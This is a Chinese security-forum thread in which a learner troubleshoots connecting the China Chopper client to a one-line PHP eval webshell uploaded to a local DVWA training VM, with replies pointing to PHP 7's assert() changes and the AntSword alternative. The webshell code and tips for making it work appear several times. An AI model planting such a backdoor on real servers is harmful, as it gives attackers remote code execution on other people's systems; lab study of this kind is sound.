[求助] 使用菜刀，但不能获取到网站文件-WEB安全-看雪-安全社区|安全招聘|kanxue.com

[求助] 使用菜刀，但不能获取到网站文件

发表于: 2017-8-8 10:08 7632

[求助] 使用菜刀，但不能获取到网站文件

自由的翅膀

2017-8-8 10:08

7632

我在dvwa上上传了文件，安全等级为low

test.php文件内容为：

<?php @eval($_POST['caidao']);?>

在菜刀20160820中连接

获取文件就有问题

求指点，怎么解决

[培训]内核驱动高级班，冲击BAT一流互联网大厂工作，每周日13:00-18:00直播授课

收藏・2

免费・0

支持

最新回复 (21)
colddog 雪币： 35 活跃值： (10) 能力值： ( LV3，RANK：30 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	colddog 2 楼 utf8 试下 2017-8-8 10:25 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 3 楼 colddog utf8 试下试过了，一样，最多乱码的内容有点不同 2017-8-8 12:00 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 4 楼到靶机上检查马的路径；检查马的单引号、分号等是否为英文；自己先在靶机上写个马，再用菜刀连接，以检查是否有其他未知因素。。。 2017-8-8 14:08 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 5 楼从另一个地方下的菜刀，这个就查看目录的时候总是500，internal server error.....我开始觉得是不是菜刀的问题了......有朋友提供一个确定没问题的菜刀吗.......... 2017-8-8 14:39 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 6 楼 afy 到靶机上检查马的路径；检查马的单引号、分号等是否为英文；自己先在靶机上写个马，再用菜刀连接，以检查是否有其他未知因素。。。试过了，应该没有你说的问题 2017-8-8 14:40 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 7 楼自由的翅膀试过了，应该没有你说的问题应该？？？我不明白你的意思。我现在想知道，你自己先在靶机上写个马，用菜刀能不能连接上？？？ 2017-8-8 16:11 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 8 楼 afy 应该？？？我不明白你的意思。我现在想知道，你自己先在靶机上写个马，用菜刀能不能连接上？？？连不上 2017-8-8 17:07 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 9 楼自由的翅膀连不上直接在网站目录下添加一个一句话木马，然后用菜刀连这个文件都连不上 2017-8-8 17:08 0
lixinwk 雪币： 168 活跃值： (70) 能力值： ( LV4，RANK：50 ) 在线值：发帖 14 回帖 98 粉丝 0 关注私信	lixinwk 1 10 楼检查对方是否开启网站安全防御，CDN什么的 2017-8-9 09:38 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 11 楼自由的翅膀直接在网站目录下添加一个一句话木马，然后用菜刀连这个文件都连不上如果靶机上有安全狗之类的防护软件，先彻底关闭；换菜刀；我还真怀疑你知不知道网站根目录在哪，写个phpinfo看看。 2017-8-9 09:53 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 12 楼 afy 如果靶机上有安全狗之类的防护软件，先彻底关闭；换菜刀；我还真怀疑你知不知道网站根目录在哪，写个phpinfo看看。没安全狗，没任何防护软件。自己手动post一个包到上传的包含一句话木马的php页面，能正常访问。昨天菜刀连上去，响应报文content length为0，今天把小马由 <?php @eval($_POST['chopper']);?> 改为了这样 <?php eval($_POST['chopper']);?> ，菜刀中就显示了报错信息，以下是菜刀中显示的响应报文 HTTP/1.1 200 OK Date: Wed, 09 Aug 2017 02:51:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/7.1.6 X-Powered-By: PHP/7.1.6 Content-Length: 185 Content-Type: text/html; charset=UTF-8 <br /> <b>Warning</b>: Cannot call assert() with string argument dynamically in <b>C:\xampp\htdocs\DVWA-master\hackable\uploads\test1.php(1) : eval()'d code</b> on line <b>1</b><br /> 我觉得是菜刀的问题了 2017-8-9 10:52 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 13 楼 afy 如果靶机上有安全狗之类的防护软件，先彻底关闭；换菜刀；我还真怀疑你知不知道网站根目录在哪，写个phpinfo看看。 phpinfo内容太多，不知该截哪部分的图 2017-8-9 11:00 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 14 楼 lixinwk 检查对方是否开启网站安全防御，CDN什么的什么防护都没，靶机只是我vmware里的一台虚拟机，我连windows防火墙也关了 2017-8-9 11:02 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 15 楼自由的翅膀 phpinfo内容太多，不知该截哪部分的图那就没问题啊，换一句话木马，换菜刀。。。 2017-8-9 11:05 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 16 楼啊，知道了，你的php版本是7，版本比较高，你看看这个 http://php.net/manual/zh/migration71.incompatible.php，把php版本切换到5试试。 2017-8-9 11:13 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 17 楼 afy 啊，知道了，你的php版本是7，版本比较高，你看看这个 http://php.net/manual/zh/migration71.incompatible. ... 所以我应该把php版本降低？ 2017-8-9 11:18 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 18 楼自由的翅膀所以我应该把php版本降低？搞定没啊，大佬。。。 2017-8-9 11:52 0
wooyunking 雪币： 1037 活跃值： (1780) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 148 粉丝 3 关注私信	wooyunking 19 楼一群水货，别人本地搭建的DVWA还说什么CDN狗和杀软的问题，也是服了，这个你换成蚁剑连接 2017-8-10 16:55 1
彩虹妹雪币： 29 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	彩虹妹 20 楼 wooyunking 一群水货，别人本地搭建的DVWA还说什么CDN狗和杀软的问题，也是服了，这个你换成蚁剑连接换成蚁剑就好了，可能是菜刀已经过时了，下的版本都不匹配了，php都7了 2019-8-15 18:23 0
dayang 雪币： 220 活跃值： (766) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 937 粉丝 1 关注私信	dayang 21 楼 PHP 7以上版本的ASSERT不能当后门用了，你用的这个版本的菜刀中有用到了这个函数，所以你这个版本的菜刀不能用了。这类的问题，可以抓包分析下 2019-8-15 19:36 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

自由的翅膀

发帖

103

回帖

RANK

关注

私信

他的文章

关于我们

联系我们

企业服务

看雪公众号

最新回复 (21)
colddog 雪币： 35 活跃值： (10) 能力值： ( LV3，RANK：30 ) 在线值：发帖 1 回帖 2 粉丝 0 关注私信	colddog 2 楼 utf8 试下 2017-8-8 10:25 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 3 楼 colddog utf8 试下试过了，一样，最多乱码的内容有点不同 2017-8-8 12:00 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 4 楼到靶机上检查马的路径；检查马的单引号、分号等是否为英文；自己先在靶机上写个马，再用菜刀连接，以检查是否有其他未知因素。。。 2017-8-8 14:08 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 5 楼从另一个地方下的菜刀，这个就查看目录的时候总是500，internal server error.....我开始觉得是不是菜刀的问题了......有朋友提供一个确定没问题的菜刀吗.......... 2017-8-8 14:39 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 6 楼 afy 到靶机上检查马的路径；检查马的单引号、分号等是否为英文；自己先在靶机上写个马，再用菜刀连接，以检查是否有其他未知因素。。。试过了，应该没有你说的问题 2017-8-8 14:40 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 7 楼自由的翅膀试过了，应该没有你说的问题应该？？？我不明白你的意思。我现在想知道，你自己先在靶机上写个马，用菜刀能不能连接上？？？ 2017-8-8 16:11 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 8 楼 afy 应该？？？我不明白你的意思。我现在想知道，你自己先在靶机上写个马，用菜刀能不能连接上？？？连不上 2017-8-8 17:07 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 9 楼自由的翅膀连不上直接在网站目录下添加一个一句话木马，然后用菜刀连这个文件都连不上 2017-8-8 17:08 0
lixinwk 雪币： 168 活跃值： (70) 能力值： ( LV4，RANK：50 ) 在线值：发帖 14 回帖 98 粉丝 0 关注私信	lixinwk 1 10 楼检查对方是否开启网站安全防御，CDN什么的 2017-8-9 09:38 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 11 楼自由的翅膀直接在网站目录下添加一个一句话木马，然后用菜刀连这个文件都连不上如果靶机上有安全狗之类的防护软件，先彻底关闭；换菜刀；我还真怀疑你知不知道网站根目录在哪，写个phpinfo看看。 2017-8-9 09:53 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 12 楼 afy 如果靶机上有安全狗之类的防护软件，先彻底关闭；换菜刀；我还真怀疑你知不知道网站根目录在哪，写个phpinfo看看。没安全狗，没任何防护软件。自己手动post一个包到上传的包含一句话木马的php页面，能正常访问。昨天菜刀连上去，响应报文content length为0，今天把小马由 <?php @eval($_POST['chopper']);?> 改为了这样 <?php eval($_POST['chopper']);?> ，菜刀中就显示了报错信息，以下是菜刀中显示的响应报文 HTTP/1.1 200 OK Date: Wed, 09 Aug 2017 02:51:27 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/7.1.6 X-Powered-By: PHP/7.1.6 Content-Length: 185 Content-Type: text/html; charset=UTF-8 <br /> <b>Warning</b>: Cannot call assert() with string argument dynamically in <b>C:\xampp\htdocs\DVWA-master\hackable\uploads\test1.php(1) : eval()'d code</b> on line <b>1</b><br /> 我觉得是菜刀的问题了 2017-8-9 10:52 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 13 楼 afy 如果靶机上有安全狗之类的防护软件，先彻底关闭；换菜刀；我还真怀疑你知不知道网站根目录在哪，写个phpinfo看看。 phpinfo内容太多，不知该截哪部分的图 2017-8-9 11:00 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 14 楼 lixinwk 检查对方是否开启网站安全防御，CDN什么的什么防护都没，靶机只是我vmware里的一台虚拟机，我连windows防火墙也关了 2017-8-9 11:02 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 15 楼自由的翅膀 phpinfo内容太多，不知该截哪部分的图那就没问题啊，换一句话木马，换菜刀。。。 2017-8-9 11:05 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 16 楼啊，知道了，你的php版本是7，版本比较高，你看看这个 http://php.net/manual/zh/migration71.incompatible.php，把php版本切换到5试试。 2017-8-9 11:13 0
自由的翅膀雪币： 30 活跃值： (221) 能力值： ( LV2，RANK：10 ) 在线值：发帖 29 回帖 103 粉丝 0 关注私信	自由的翅膀 17 楼 afy 啊，知道了，你的php版本是7，版本比较高，你看看这个 http://php.net/manual/zh/migration71.incompatible. ... 所以我应该把php版本降低？ 2017-8-9 11:18 0
afy 雪币： 70 活跃值： (26) 能力值： ( LV3，RANK：20 ) 在线值：发帖 1 回帖 13 粉丝 0 关注私信	afy 18 楼自由的翅膀所以我应该把php版本降低？搞定没啊，大佬。。。 2017-8-9 11:52 0
wooyunking 雪币： 1037 活跃值： (1780) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 148 粉丝 3 关注私信	wooyunking 19 楼一群水货，别人本地搭建的DVWA还说什么CDN狗和杀软的问题，也是服了，这个你换成蚁剑连接 2017-8-10 16:55 1
彩虹妹雪币： 29 活跃值： (10) 能力值： ( LV2，RANK：10 ) 在线值：发帖 0 回帖 2 粉丝 0 关注私信	彩虹妹 20 楼 wooyunking 一群水货，别人本地搭建的DVWA还说什么CDN狗和杀软的问题，也是服了，这个你换成蚁剑连接换成蚁剑就好了，可能是菜刀已经过时了，下的版本都不匹配了，php都7了 2019-8-15 18:23 0
dayang 雪币： 220 活跃值： (766) 能力值： ( LV2，RANK：10 ) 在线值：发帖 38 回帖 937 粉丝 1 关注私信	dayang 21 楼 PHP 7以上版本的ASSERT不能当后门用了，你用的这个版本的菜刀中有用到了这个函数，所以你这个版本的菜刀不能用了。这类的问题，可以抓包分析下 2019-8-15 19:36 0
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复